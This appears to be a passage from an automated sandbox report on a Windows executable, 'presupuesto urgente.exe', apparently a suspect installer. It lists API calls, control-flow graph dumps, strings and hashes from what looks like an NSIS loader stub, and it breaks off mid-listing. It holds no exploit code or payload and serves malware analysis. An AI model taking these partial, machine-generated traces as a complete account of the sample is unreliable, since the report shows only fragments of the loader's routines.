138->126
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034AC
                                                                                                                                                      • GetVersion.KERNEL32 ref: 004034B2
                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403529
                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\presupuesto urgente.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403820
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\presupuesto urgente.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004039C6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\Desktop$C:\Users\user\Desktop\presupuesto urgente.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                      • API String ID: 2488574733-3239275121
                                                                                                                                                      • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                                      • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                                                                                      • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                                      • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 213 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 216 402f64-402f69 213->216 217 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 213->217 218 4031b3-4031b7 216->218 225 402fa2-402fb9 217->225 226 40308c-40309a call 402e72 217->226 228 402fbb 225->228 229 402fbd-402fca call 40342b 225->229 233 4030a0-4030a3 226->233 234 40316b-403170 226->234 228->229 235 402fd0-402fd6 229->235 236 403127-40312f call 402e72 229->236 237 4030a5-4030bd call 403441 call 40342b 233->237 238 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 233->238 234->218 239 403056-40305a 235->239 240 402fd8-402ff0 call 405e5d 235->240 236->234 237->234 261 4030c3-4030c9 237->261 264 403131-403161 call 403441 call 4031ba 238->264 265 40311d-403122 238->265 244 403063-403069 239->244 245 40305c-403062 call 402e72 239->245 240->244 259 402ff2-402ff9 240->259 251 40306b-403079 call 40687d 244->251 252 40307c-403086 244->252 245->244 251->252 252->225 252->226 259->244 263 402ffb-403002 259->263 261->234 261->238 263->244 266 403004-40300b 263->266 273 403166-403169 264->273 265->218 266->244 268 40300d-403014 266->268 268->244 270 403016-403036 268->270 270->234 272 40303c-403040 270->272 275 403042-403046 272->275 276 403048-403050 272->276 273->234 274 403172-403183 273->274 277 403185 274->277 278 40318b-403190 274->278 275->226 275->276 276->244 279 403052-403054 276->279 277->278 280 403191-403197 278->280 279->244 280->280 281 403199-4031b1 call 405e5d 280->281 281->218
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F28
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\presupuesto urgente.exe,00000400), ref: 00402F44
                                                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00402F8D
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\presupuesto urgente.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                      • API String ID: 2803837635-3997448147
                                                                                                                                                      • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                                      • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                                                                                                      • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                                      • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4227406936-0
                                                                                                                                                      • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                      • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 484 405abe-405ae4 call 405d89 487 405ae6-405af8 DeleteFileW 484->487 488 405afd-405b04 484->488 489 405c7a-405c7e 487->489 490 405b06-405b08 488->490 491 405b17-405b27 call 4063b0 488->491 493 405c28-405c2d 490->493 494 405b0e-405b11 490->494 497 405b36-405b37 call 405ccd 491->497 498 405b29-405b34 lstrcatW 491->498 493->489 496 405c2f-405c32 493->496 494->491 494->493 499 405c34-405c3a 496->499 500 405c3c-405c44 call 4066f3 496->500 501 405b3c-405b40 497->501 498->501 499->489 500->489 508 405c46-405c5a call 405c81 call 405a76 500->508 504 405b42-405b4a 501->504 505 405b4c-405b52 lstrcatW 501->505 504->505 507 405b57-405b73 lstrlenW FindFirstFileW 504->507 505->507 509 405b79-405b81 507->509 510 405c1d-405c21 507->510 526 405c72-405c75 call 405414 508->526 527 405c5c-405c5f 508->527 513 405ba1-405bb5 call 4063b0 509->513 514 405b83-405b8b 509->514 510->493 512 405c23 510->512 512->493 524 405bb7-405bbf 513->524 525 405bcc-405bd7 call 405a76 513->525 516 405c00-405c10 FindNextFileW 514->516 517 405b8d-405b95 514->517 516->509 520 405c16-405c17 FindClose 516->520 517->513 521 405b97-405b9f 517->521 520->510 521->513 521->516 524->516 529 405bc1-405bca call 405abe 524->529 537 405bf8-405bfb call 405414 525->537 538 405bd9-405bdc 525->538 526->489 527->499 528 405c61-405c70 call 405414 call 406176 527->528 528->489 529->516 537->516 540 405bf0-405bf6 538->540 541 405bde-405bee call 405414 call 406176 538->541 540->516 541->516
                                                                                                                                                      APIs
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405AE7
                                                                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B2F
                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B52
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B58
                                                                                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B68
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                      • API String ID: 2035342205-2554713587
                                                                                                                                                      • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                                      • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                                                                                      • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                                      • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 842 406aba-406abf 843 406b30-406b4e 842->843 844 406ac1-406af0 842->844 845 407126-40713b 843->845 846 406af2-406af5 844->846 847 406af7-406afb 844->847 848 407155-40716b 845->848 849 40713d-407153 845->849 850 406b07-406b0a 846->850 851 406b03 847->851 852 406afd-406b01 847->852 855 40716e-407175 848->855 849->855 853 406b28-406b2b 850->853 854 406b0c-406b15 850->854 851->850 852->850 858 406cfd-406d1b 853->858 856 406b17 854->856 857 406b1a-406b26 854->857 859 407177-40717b 855->859 860 40719c-4071a8 855->860 856->857 862 406b90-406bbe 857->862 865 406d33-406d45 858->865 866 406d1d-406d31 858->866 863 407181-407199 859->863 864 40732a-407334 859->864 869 40693e-406947 860->869 870 406bc0-406bd8 862->870 871 406bda-406bf4 862->871 863->860 867 407340-407353 864->867 868 406d48-406d52 865->868 866->868 877 407358-40735c 867->877 872 406d54 868->872 873 406cf5-406cfb 868->873 874 407355 869->874 875 40694d 869->875 876 406bf7-406c01 870->876 871->876 878 406cd0-406cd4 872->878 879 406e65-406e72 872->879 873->858 880 406c99-406ca3 873->880 874->877 881 406954-406958 875->881 882 406a94-406ab5 875->882 883 4069f9-4069fd 875->883 884 406a69-406a6d 875->884 885 406c07 876->885 886 406b78-406b7e 876->886 897 406cda-406cf2 878->897 898 4072dc-4072e6 878->898 879->869 890 406ec1-406ed0 879->890 893 4072e8-4072f2 880->893 894 406ca9-406ccb 880->894 881->867 899 40695e-40696b 881->899 882->845 891 406a03-406a1c 883->891 892 4072a9-4072b3 883->892 888 406a73-406a87 884->888 889 4072b8-4072c2 884->889 901 4072c4-4072ce 885->901 902 406b5d-406b75 885->902 895 406c31-406c37 886->895 896 406b84-406b8a 886->896 900 406a8a-406a92 888->900 889->867 890->845 906 406a1f-406a23 891->906 892->867 893->867 894->879 903 406c95 895->903 905 406c39-406c57 895->905 896->862 896->903 897->873 898->867 899->874 904 406971-4069b7 899->904 900->882 900->884 901->867 902->886 903->880 907 4069b9-4069bd 904->907 908 4069df-4069e1 904->908 909 406c59-406c6d 905->909 910 406c6f-406c81 905->910 906->883 911 406a25-406a2b 906->911 912 4069c8-4069d6 GlobalAlloc 907->912 913 4069bf-4069c2 GlobalFree 907->913 915 4069e3-4069ed 908->915 916 4069ef-4069f7 908->916 914 406c84-406c8e 909->914 910->914 917 406a55-406a67 911->917 918 406a2d-406a34 911->918 912->874 919 4069dc 912->919 913->912 914->895 920 406c90 914->920 915->915 915->916 916->906 917->900 921 406a36-406a39 GlobalFree 918->921 922 406a3f-406a4f GlobalAlloc 918->922 919->908 924 4072d0-4072da 920->924 925 406c16-406c2e 920->925 921->922 922->874 922->917 924->867 925->895
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                                      • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                                                                                                      • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                                      • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0), ref: 004066FE
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 0040670A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID: xgB
                                                                                                                                                      • API String ID: 2295610775-399326502
                                                                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                      • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                      • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 139 403abe-403ad6 call 40678a 142 403ad8-403ae8 call 4062f7 139->142 143 403aea-403b21 call 40627e 139->143 151 403b44-403b6d call 403d94 call 405d89 142->151 147 403b23-403b34 call 40627e 143->147 148 403b39-403b3f lstrcatW 143->148 147->148 148->151 157 403b73-403b78 151->157 158 403bff-403c07 call 405d89 151->158 157->158 159 403b7e-403ba6 call 40627e 157->159 163 403c15-403c3a LoadImageW 158->163 164 403c09-403c10 call 4063d2 158->164 159->158 169 403ba8-403bac 159->169 167 403cbb-403cc3 call 40140b 163->167 168 403c3c-403c6c RegisterClassW 163->168 164->163 182 403cc5-403cc8 167->182 183 403ccd-403cd8 call 403d94 167->183 172 403c72-403cb6 SystemParametersInfoW CreateWindowExW 168->172 173 403d8a 168->173 170 403bbe-403bca lstrlenW 169->170 171 403bae-403bbb call 405cae 169->171 177 403bf2-403bfa call 405c81 call 4063b0 170->177 178 403bcc-403bda lstrcmpiW 170->178 171->170 172->167 176 403d8c-403d93 173->176 177->158 178->177 181 403bdc-403be6 GetFileAttributesW 178->181 185 403be8-403bea 181->185 186 403bec-403bed call 405ccd 181->186 182->176 192 403d61-403d69 call 4054e7 183->192 193 403cde-403cf8 ShowWindow call 40671a 183->193 185->177 185->186 186->177 198 403d83-403d85 call 40140b 192->198 199 403d6b-403d71 192->199 200 403d04-403d16 GetClassInfoW 193->200 201 403cfa-403cff call 40671a 193->201 198->173 199->182 206 403d77-403d7e call 40140b 199->206 204 403d18-403d28 GetClassInfoW RegisterClassW 200->204 205 403d2e-403d5f DialogBoxParamW call 40140b call 403a0e 200->205 201->200 204->205 205->176 206->182
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
